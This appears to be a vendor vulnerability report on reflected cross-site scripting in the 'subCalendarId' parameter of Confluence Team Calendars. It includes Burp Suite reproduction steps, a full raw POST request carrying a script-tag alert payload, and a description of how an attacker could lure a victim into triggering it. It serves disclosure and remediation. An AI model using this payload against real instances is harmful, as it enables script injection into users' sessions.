The contents of the 'subCalendarId' parameter is not validated in POST requests to 'subscribetocalendar.action' and is susceptible to cross-site scripting.

Steps to Reproduce:

1. Start a proxy tool such as Burp Suite.
2. Log into a Confluence instance with Team Calendars installed.
3. Use the proxy tool to generate a POST request to '/confluence/calendar/subscribetocalendar.action' with the following payload:

   POST /confluence/calendar/subscribetocalendar.action HTTP/1.1
   Host: rgallagher:1990
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Referer: http://rgallagher:1990/confluence/calendar/subscribetocalendar.action
   Cookie: confluence-sidebar.width=285; JSESSIONID=E85F825667B40A9201910EE6FF9DF7EA; AJS.conglomerate.cookie=""
   Connection: keep-alive
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 75

   subCalendarId=<script>alert('XSS in subscribetocalendar.action')<%2fscript>

4. Ensure that a valid value is sent in the 'JSESSIONID' cookie.
5. Send the request from Burp Repeater, and view the output in the browser.
6. The payload sent in the POST body is reflected in the HTTP response, and its JavaScript executes.

We've demonstrated the exploitability using Burp Suite because the customer who reported the vulnerability was unable to include steps to reproduce from the UI. An attacker could exploit this instance of cross-site scripting by inducing a user to click on a link which submits the malicious POST request to the victim's Confluence domain.